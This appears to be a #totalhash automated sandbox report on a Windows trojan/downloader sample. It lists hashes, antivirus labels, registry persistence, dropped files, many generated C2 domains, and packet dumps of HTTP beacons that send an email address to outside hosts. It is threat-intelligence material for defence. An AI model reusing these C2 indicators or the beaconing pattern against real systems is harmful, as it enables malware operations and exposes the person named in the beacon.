Analysis | #totalhash

Analysis Date	2015-08-19 08:51:27
MD5	55f9a1f3bd4b6588aeca4d4bd0066da3
SHA1	4beb2faeb107e228931427160814de8837fe6260

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: 96433aeb8b7de9e599af5116e5320285 sha1: ee53c735b0c78cb802abe8802f7c815eee1be251 size: 299520
Section	.rdata md5: 72a9439c6ff087869accd32be38242de sha1: ab512634b7385628eec7a1b37254156c72d303a1 size: 34304
Section	.data md5: 5ff41039ae47da11ba6b8ce9ef79591c sha1: bda18c8b4034f7c4f2fb8365a2508bbe4317519e size: 98304
Timestamp	2014-10-30 10:10:32
Packer	Microsoft Visual C++ ?.?
PEhash	bf684f27c3e73973ff5dd5ac228c5391d4d6cbc4
IMPhash	69e8bc9396189de1eb5059fccc3bf34d
AV	CA (E-Trust Ino)	Heur/Downloader.ZALU!suspicious
AV	F-Secure	Gen:Variant.Symmi.22722
AV	Dr. Web	Trojan.DownLoader15.32945
AV	ClamAV	no_virus
AV	Arcabit (arcavir)	Gen:Variant.Symmi.22722
AV	BullGuard	Gen:Variant.Symmi.22722
AV	Padvish	no_virus
AV	VirusBlokAda (vba32)	no_virus
AV	CAT (quickheal)	Trojan.Dynamer.AC3
AV	Trend Micro	TROJ_FORUCON.BMC
AV	Kaspersky	Trojan.Win32.Generic
AV	Zillya!	no_virus
AV	Emsisoft	Gen:Variant.Symmi.22722
AV	Ikarus	Trojan.FBAccountLock
AV	Frisk (f-prot)	no_virus
AV	Authentium	W32/Wonton.B.gen!Eldorado
AV	MalwareBytes	Trojan.Zbot.WHE
AV	MicroWorld (escan)	Gen:Variant.Symmi.22722
AV	Microsoft Security Essentials	TrojanSpy:Win32/Nivdort.BD
AV	K7	Trojan ( 004cb2771 )
AV	BitDefender	Gen:Variant.Symmi.22722
AV	Fortinet	W32/Agent.VNC!tr
AV	Symantec	Downloader.Upatre!g15
AV	Grisoft (avg)	Win32/Cryptor
AV	Eset (nod32)	Win32/Agent.VNC
AV	Alwil (avast)	Downloader-TLD [Trj]
AV	Ad-Aware	Gen:Variant.Symmi.22722
AV	Twister	no_virus
AV	Avira (antivir)	BDS/Zegost.Gen4
AV	Mcafee	Trojan-FEMT!55F9A1F3BD4B
AV	Rising	0x58ef8c3a

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Function Ordering Video Software ➝ C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe
Creates File	C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe
Creates Process	C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe

Creates File	C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.vogp
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\xicogfhng.exe
Creates Process	WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\qeerarcddwnr\olwprialx.exe"

Network Details:

DNS	simpleoffice.net Type: A 50.63.202.104
DNS	mountainsupply.net Type: A 67.18.199.2
DNS	windowsupply.net Type: A 173.236.172.44
DNS	sweetoffice.net Type: A 162.213.251.173
DNS	materialsupply.net Type: A 184.168.221.36
DNS	laughstrong.net Type: A 50.21.189.209
DNS	severaoffice.net Type: A
DNS	laughoffice.net Type: A
DNS	severaarrive.net Type: A
DNS	laugharrive.net Type: A
DNS	simplesupply.net Type: A
DNS	mothersupply.net Type: A
DNS	simpledistance.net Type: A
DNS	motherdistance.net Type: A
DNS	motheroffice.net Type: A
DNS	simplearrive.net Type: A
DNS	motherarrive.net Type: A
DNS	possiblesupply.net Type: A
DNS	mountaindistance.net Type: A
DNS	possibledistance.net Type: A
DNS	mountainoffice.net Type: A
DNS	possibleoffice.net Type: A
DNS	mountainarrive.net Type: A
DNS	possiblearrive.net Type: A
DNS	perhapssupply.net Type: A
DNS	perhapsdistance.net Type: A
DNS	windowdistance.net Type: A
DNS	perhapsoffice.net Type: A
DNS	windowoffice.net Type: A
DNS	perhapsarrive.net Type: A
DNS	windowarrive.net Type: A
DNS	wintersupply.net Type: A
DNS	subjectsupply.net Type: A
DNS	winterdistance.net Type: A
DNS	subjectdistance.net Type: A
DNS	winteroffice.net Type: A
DNS	subjectoffice.net Type: A
DNS	winterarrive.net Type: A
DNS	subjectarrive.net Type: A
DNS	finishsupply.net Type: A
DNS	leavesupply.net Type: A
DNS	finishdistance.net Type: A
DNS	leavedistance.net Type: A
DNS	finishoffice.net Type: A
DNS	leaveoffice.net Type: A
DNS	finisharrive.net Type: A
DNS	leavearrive.net Type: A
DNS	sweetsupply.net Type: A
DNS	probablysupply.net Type: A
DNS	sweetdistance.net Type: A
DNS	probablydistance.net Type: A
DNS	probablyoffice.net Type: A
DNS	sweetarrive.net Type: A
DNS	probablyarrive.net Type: A
DNS	severalsupply.net Type: A
DNS	severaldistance.net Type: A
DNS	materialdistance.net Type: A
DNS	severaloffice.net Type: A
DNS	materialoffice.net Type: A
DNS	severalarrive.net Type: A
DNS	materialarrive.net Type: A
DNS	severastrong.net Type: A
DNS	severatrouble.net Type: A
DNS	laughtrouble.net Type: A
DNS	severapresident.net Type: A
DNS	laughpresident.net Type: A
DNS	severacaught.net Type: A
DNS	laughcaught.net Type: A
DNS	simplestrong.net Type: A
DNS	motherstrong.net Type: A
DNS	simpletrouble.net Type: A
DNS	mothertrouble.net Type: A
DNS	simplepresident.net Type: A
DNS	motherpresident.net Type: A
DNS	simplecaught.net Type: A
DNS	mothercaught.net Type: A
DNS	mountainstrong.net Type: A
DNS	possiblestrong.net Type: A
DNS	mountaintrouble.net Type: A
DNS	possibletrouble.net Type: A
DNS	mountainpresident.net Type: A
DNS	possiblepresident.net Type: A
DNS	mountaincaught.net Type: A
DNS	possiblecaught.net Type: A
DNS	perhapsstrong.net Type: A
HTTP GET	http://simpleoffice.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent:
HTTP GET	http://mountainsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent:
HTTP GET	http://windowsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent:
HTTP GET	http://sweetoffice.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent:
HTTP GET	http://materialsupply.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent:
HTTP GET	http://laughstrong.net/index.php?email=amalia_rido@yahoo.com&method=post&len User-Agent:
Flows TCP	192.168.1.1:1031 ➝ 50.63.202.104:80
Flows TCP	192.168.1.1:1032 ➝ 67.18.199.2:80
Flows TCP	192.168.1.1:1033 ➝ 173.236.172.44:80
Flows TCP	192.168.1.1:1034 ➝ 162.213.251.173:80
Flows TCP	192.168.1.1:1035 ➝ 184.168.221.36:80
Flows TCP	192.168.1.1:1036 ➝ 50.21.189.209:80

Raw Pcap

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d616d61 6c69615f 7269646f   mail=amalia_rido
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 696d706c   ose..Host: simpl
0x00000070 (00112)   656f6666 6963652e 6e65740d 0a0d0a     eoffice.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d616d61 6c69615f 7269646f   mail=amalia_rido
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 6f756e74   ose..Host: mount
0x00000070 (00112)   61696e73 7570706c 792e6e65 740d0a0d   ainsupply.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d616d61 6c69615f 7269646f   mail=amalia_rido
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2077 696e646f   ose..Host: windo
0x00000070 (00112)   77737570 706c792e 6e65740d 0a0d0a0d   wsupply.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d616d61 6c69615f 7269646f   mail=amalia_rido
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 77656574   ose..Host: sweet
0x00000070 (00112)   6f666669 63652e6e 65740d0a 0d0a0a0d   office.net......
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d616d61 6c69615f 7269646f   mail=amalia_rido
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 61746572   ose..Host: mater
0x00000070 (00112)   69616c73 7570706c 792e6e65 740d0a0d   ialsupply.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d616d61 6c69615f 7269646f   mail=amalia_rido
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206c 61756768   ose..Host: laugh
0x00000070 (00112)   7374726f 6e672e6e 65740d0a 0d0a0a0d   strong.net......
0x00000080 (00128)   0a                                    .

Strings